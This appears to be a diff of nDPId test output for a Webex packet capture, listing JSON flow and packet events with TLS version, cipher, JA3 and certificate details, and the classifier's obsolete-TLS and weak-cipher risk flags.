+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1444570713727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570713727,"pkt":"ABoRAAACABoRAAABCABFAAAoA8NAABAGnnZQSm5ECggAAQG7gxds2YS5kyZ7R1AS\/\/9iaAAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1444570713730,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570713730,"pkt":"ABoRAAACABoRAAABCABFAAAom59AAEAG1pkKCAABUEpuRIMXAbuTJntHbNmEulAQOQgpYQAA"} +00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1429,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570713719,"flow_last_seen":1444570713734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570713734,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1433,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570713719,"flow_last_seen":1444570715238,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570715238,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1454,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570716599,"flow_last_seen":1444570716599,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570716599,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1444570716599,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570716599,"pkt":"ABoRAAACABoRAAABCABFAAA8ldZAAEAGdtEKCAABPm3lnsqRAbsgVHeCAAAAAKACOQiaIAAAAgQFtAQCCAoATOJUAAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1444570716603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570716603,"pkt":"ABoRAAACABoRAAABCABFAAAoA9FAABAGOOs+beWeCggAAQG7ypHfq4h9IFR3g1AS\/\/+1cAAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1456,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1444570716604,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570716604,"pkt":"ABoRAAACABoRAAABCABFAAAolddAAEAGduQKCAABPm3lnsqRAbsgVHeD36uIflAQOQh8aQAA"} +00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1457,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570716599,"flow_last_seen":1444570716610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570716610,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01404{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1460,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570716599,"flow_last_seen":1444570717923,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570717923,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1483,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570718801,"flow_last_seen":1444570718801,"flow_idle_time":180000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1444570718801,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51772,"dst_port":9000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1483,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1444570718801,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":50,"pkt_l4_len":16,"thread_ts_msec":1444570718801,"pkt":"ABoRAAACABoRAAABCABFAAAk4zFAAEARKYMKCAABPm3lnso8IygAEONTAQAAAAAAAAE="} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1484,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1444570718921,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":50,"pkt_l4_len":16,"thread_ts_msec":1444570718921,"pkt":"ABoRAAACABoRAAABCABFAAAkA95AABARONc+beWeCggAASMoyjwAEESbAgAAAAC4nQE="} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1485,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1444570718924,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":50,"pkt_l4_len":16,"thread_ts_msec":1444570718924,"pkt":"ABoRAAACABoRAAABCABFAAAk4zJAAEARKYIKCAABPm3lnso8IygAEONTAQAAAAAAAAE="} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1491,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570719041,"flow_last_seen":1444570719041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570719041,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51859,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1491,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1444570719041,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570719041,"pkt":"ABoRAAACABoRAAABCABFAAA8mB5AAEAGdIkKCAABPm3lnsqTAbu3\/XtaAAAAAKACOQj9rAAAAgQFtAQCCAoATONEAAAAAAEDAwY="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1444570719047,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570719047,"pkt":"ABoRAAACABoRAAABCABFAAAoA+JAABAGONo+beWeCggAAQG7ypNIAoSlt\/17W1AS\/\/+1bgAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1494,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1444570720045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570720045,"pkt":"ABoRAAACABoRAAABCABFAAAoAABAAEAGDLwKCAABPm3lnsqTAbu3\/XtbAAAAAFAEAACCJAAA"} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1527,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570732086,"flow_last_seen":1444570732086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570732086,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1527,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1444570732086,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570732086,"pkt":"ABoRAAACABoRAAABCABFAAA8h\/tAAEAGidIKCAABPm3geMf2AbvHvWEvAAAAAKACOQgMSwAAAgQFtAQCCAoATObUAAAAAAEDAwY="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1528,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1444570732090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570732090,"pkt":"ABoRAAACABoRAAABCABFAAAoA+tAABAGPfc+beB4CggAAQG7x\/Y4Qp7Qx71hMFAS\/\/+9MQAA"} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1531,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1444570733095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570733095,"pkt":"ABoRAAACABoRAAABCABFAAA8h\/xAAEAGidEKCAABPm3geMf2AbvHvWEvAAAAAKACOQgL5wAAAgQFtAQCCAoATOc4AAAAAAEDAwY="} -00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1536,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570732086,"flow_last_seen":1444570733112,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1444570733112,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51190,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1544,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570738415,"flow_last_seen":1444570738415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570738415,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1544,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1444570738415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570738415,"pkt":"ABoRAAACABoRAAABCABFAAA8pZ5AAEAGbC8KCAABPm3geMf6AbsEHk9CAAAAAKACOQjdywAAAgQFtAQCCAoATOrcAAAAAAEDAwY="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1545,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1444570738418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738418,"pkt":"ABoRAAACABoRAAABCABFAAAoA+9AABAGPfM+beB4CggAAQG7x\/r74bC9BB5PQ1AS\/\/+9LQAA"} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1546,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570738419,"flow_last_seen":1444570738419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570738419,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51195,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1546,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1444570738419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570738419,"pkt":"ABoRAAACABoRAAABCABFAAA8eOlAAEAGmOQKCAABPm3geMf7AbvAYZI1AAAAAKACOQjekwAAAgQFtAQCCAoATOrcAAAAAAEDAwY="} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1547,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1444570738422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738422,"pkt":"ABoRAAACABoRAAABCABFAAAoA\/BAABAGPfI+beB4CggAAQG7x\/s\/nm3KwGGSNlAS\/\/+9LAAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1548,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1444570738422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738422,"pkt":"ABoRAAACABoRAAABCABFAAAopZ9AAEAGbEIKCAABPm3geMf6AbsEHk9D++GwvlAQOQiEJgAA"} 
-00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1549,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1444570738422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738422,"pkt":"ABoRAAACABoRAAABCABFAAAoeOpAAEAGmPcKCAABPm3geMf7AbvAYZI2P55ty1AQOQiEJQAA"} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1550,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570738415,"flow_last_seen":1444570738424,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570738424,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1552,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570738419,"flow_last_seen":1444570738426,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570738426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51195,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete 
TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01404{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1562,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570738415,"flow_last_seen":1444570740300,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570740300,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
-00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1444570699096,"flow_last_seen":1444570740249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1123,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1444570699101,"flow_last_seen":1444570740248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":497,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1491,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570719041,"flow_last_seen":1444570719041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570719041,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51859,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1491,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1444570719041,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570719041,"pkt":"ABoRAAACABoRAAABCABFAAA8mB5AAEAGdIkKCAABPm3lnsqTAbu3\/XtaAAAAAKACOQj9rAAAAgQFtAQCCAoATONEAAAAAAEDAwY="} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1444570719047,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570719047,"pkt":"ABoRAAACABoRAAABCABFAAAoA+JAABAGONo+beWeCggAAQG7ypNIAoSlt\/17W1AS\/\/+1bgAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1494,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1444570720045,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570720045,"pkt":"ABoRAAACABoRAAABCABFAAAoAABAAEAGDLwKCAABPm3lnsqTAbu3\/XtbAAAAAFAEAACCJAAA"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1527,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570732086,"flow_last_seen":1444570732086,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570732086,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1527,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1444570732086,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570732086,"pkt":"ABoRAAACABoRAAABCABFAAA8h\/tAAEAGidIKCAABPm3geMf2AbvHvWEvAAAAAKACOQgMSwAAAgQFtAQCCAoATObUAAAAAAEDAwY="} 